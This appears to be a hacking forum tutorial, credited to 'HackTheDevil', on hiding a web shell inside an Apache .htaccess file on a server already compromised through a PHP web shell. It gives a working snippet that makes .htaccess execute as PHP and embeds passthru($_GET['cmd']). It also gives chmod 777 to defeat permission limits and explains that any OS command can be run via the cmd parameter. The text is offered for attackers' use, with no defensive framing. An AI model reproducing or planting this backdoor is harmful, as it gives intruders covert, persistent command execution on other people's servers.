Skip to main content

How to hide your shell using .htaccess

Today I want to show you a less known trick in which you can use .htaccess file. Already available on server as a shell to execute OS commands, so just follow the simple steps described below. This file is also useful to add restrictions on files.

Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.

After clicking on the edit option, add the following lines of code in your .htaccess file.


Quote:<Files ~ "^\.ht">
Order allow,deny
Allow from all
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>

After adding your codes, save it, and done !

But sometimes we can't able to edit .htaccess file due to permissions provided by the administrator so we must have to change the permissions

If we get an error: .htaccess is not readable
Then use following command to change it to the readable, writable and also in executable mode..
command: chmod 777 .htaccess

Here in above command we can see 777, The fist digit (7) is for user,
second(7) for group and third (7) is for others..!! In UNIX/Linux permissions are divided into 3 categories User-Group-Others

Now in order to use your .htaccess shell

After ?cmd= you can execute any OS command of your choice.

Source: HackTheDevil